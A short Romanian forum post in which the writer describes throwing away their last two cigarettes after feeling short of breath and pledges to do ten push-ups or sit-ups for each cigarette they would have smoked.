  Buna! In primul rand as vrea sa`i felicit pe toti cei care au renuntat la fumat si cei care vreau sa o faca le doresc multa bafta! Astazi mai aveam 6 tigari in pachet dintre care 4 le-am fumat dimineata si celelalte 2 le-am lasat pentru “facultate”. Dar in drum spre facultate (in timp ce ma grabeam) tot mai greu respiram si simteam nevoia sa ma opresc des! Trecand pe langa un cos de gunoi am luat pachetul cu cele 2 tigari in mana si m-am uitat la eu si am zis: Aaaa wtf ce ar fi sa le arunc si in loc sa pierd 2-3 minute fumand mai bine fac vreo 10 flotari sau abdomene “sa vedem diferenta” (cu un mic calcul 1 tigara=10 flotari iar pe zi ar veni in jur de 100 ) Sa speram ca va tine schema si o sa fac zilnic 100 sau char 2-300 pe zi! Sanatate tuturor !!!Adaugă un comentariu


 
 

Newsletter

Loading... Loading...